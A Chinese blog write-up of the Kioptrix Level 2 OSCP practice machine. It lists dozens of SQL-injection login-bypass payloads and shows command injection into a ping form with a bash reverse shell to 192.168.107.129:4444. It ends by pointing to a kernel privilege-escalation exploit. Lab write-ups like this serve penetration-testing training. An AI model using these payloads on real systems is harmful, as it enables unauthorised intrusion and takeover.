首页 > 其他分享 >OSCP(基础篇靶机Kioptrix Level 2)

OSCP(基础篇靶机Kioptrix Level 2)

时间:2023-11-30 21:56:05浏览次数:38  
标签:Kioptrix 1admin shell Level admin -- 内核 true OSCP

第一步:netdiscover加nmap

 第二步:通过burpsuite,利用SQLi Payloads进行SQL注入


SQLi Payloads:
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 1=1 --
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

 

 

 第三步:查找长度不一致的进行比对,并回显到浏览器,意思ping程序,输入127.0.0.1;然后字符拼接反向shell

 

 反向shell参考:https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

127.0.0.1; bash -i >& /dev/tcp/192.168.107.129/4444 0>&1

第四步:创造监听获取shell

 第五步:确定内核版本,进行权限提升

查看内核相关版本
lsb_release -a
uname -a

获取ttyshell  
python -c 'import pty; pty.spawn("/bin/sh")'

 

 

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation
https://www.exploit-db.com/exploits/9545
内核版本本地权限提升

 

 最后,成功获取root权限

 

完结撒花~

 

标签:Kioptrix,1admin,shell,Level,admin,--,内核,true,OSCP
From: https://www.cnblogs.com/justdoIT20680/p/17868454.html

相关文章

  • OSCP(基础篇靶机Kioptrix Level 1)
    第一步:netdiscover-ieth0 第二步:nmap 第三步:139samba高危服务,先看看是啥版本,利用msfmsfconsoleuseauxiliary/scanner/smb/smb_version 第四步:Samba<2.2.8(Linux/BSD)-RemoteCodeExecution存在远程代码执行漏洞kali查看某个系统的漏洞工具:msfconsole->sear......
  • BUUCT_PWN8 jarvisoj_level2
    jarvisoj_level2查看保护措施:canary没有,很好。栈可执行,这题也可以在栈上写shellcode。PIE都没开,从IDA看到的地址就是实际加载的地址了。IDA静态分析vulnerable_function里面read读了0x100字节,但是buf只有0x88字节,缓冲区溢出。那么思路很简单ida找'/bin/sh'......
  • PostgreSQL - Transaction Isolation Level
     zzh@ZZHPC:~$dockerrun--namepostgres16-p5432:5432-ePOSTGRES_USER=root-ePOSTGRES_PASSWORD=aaa-dpostgres:alpine8e36b7bdc47572723a416c319b83f20b2eac7ef25adb3ac1a875e909f45ebdb6zzh@ZZHPC:~$dockerexec-itpostgres16createdb--username=root-......
  • MySQL - Transaction Isolation Level
     zzh@ZZHPC:~$dockerrun--namemysql8-p3306:3306-eMYSQL_ROOT_PASSWORD=aaa-eMYSQL_DATABASE=simple_bank-dmysqlac3cce2a639d2379500723acbd9149aa4f92d1d76c8c7b0c3abcc0b382b311afzzh@ZZHPC:~$dockerexec-itmysql8mysql-uroot-paaasimple_bankmys......
  • ISP--Black Level Correction(黑电平矫正)
    图像的每一个像素点都是由一个光电二极管控制的,由二极管将电信号,转换为数字信号。那么,我们知道了,图像的像素值是与电信号强度相关的。但是,我们得知道,每一个光电二极管要想工作,都得有一定的电压。这就是的,即使在外部没有光线照射的时候,Sensor也会有一定的电压。那这不就会在成像......
  • 【C++】【图像处理】形态学处理(腐蚀、膨胀)算法解析(以.raw格式的图像为基础进行图像处
    1voiderosion(BYTE*image,intw,inth,BYTE*outImg)2{3intrept;4//腐蚀5memcpy(outImg,image,sizeof(BYTE)*w*h);//将读取的图像赋值给outImg,方便进行腐蚀操作67inti,j,m,n;8BYTEflag;9for(rept=0;rept......
  • 实现不同概率对应不同level思路
    背景现在我要实现一个level,有1/2概率level=1,1/4概率level=2,1/8概率level=3。。。。典型应用跳表中的randomLevel,这里提供两种实现思路随机累加简单点多次循环随机,小于1/2则level+1level=1while(rand.float(0,1)<0.5){ level++}这里有几个缺点rand.float(0......
  • 【C++】【图像处理】均值滤波和高斯滤波(低通滤波)算法解析(以.raw格式的图像为基础进行
    1voidmeanFilter(BYTE*image,intwidth,intheight,BYTE*outImg)2{3//均值滤波4intsmth[9];5inti,j,m,n;6BYTEblock[9];78//高斯卷积核初始化9smth[0]=1,smth[1]=2,smth[2]=1,10smth[3]=2,......
  • Electrical(Harware) Levels: 常用电平LVTTL、LVCMOS、LVDS、CML的标准和区别
    电平:电压范围,VOH(V.OutputHigh),VOL(V.O.Low),VIH(V.InH.),VIL(V.InL.)TTL:Transistor-TransistorLogic,可提供较大电流,驱动能力强;CMOS:ComplementaryMetalOxideSemiconductorPMOS+NMOS,常用在高速数字电路;常用电平LVTTL、LVCMOS、LVDS、CML的标准和......
  • TypeError: Cannot read properties of null (reading 'level')
    一、分析问题1、一个下拉框组件的更新由另一个下拉框组件控制被动更新列表,子级下拉框的值是由父级下拉框的值调用接口获取,每次父级下拉框值的改变都会改变子级下拉框的数据源也就是会改变子级下拉框的options,切换后之前的父级节点找不到就会报了这个错,父级节点不改变(即不切换)的......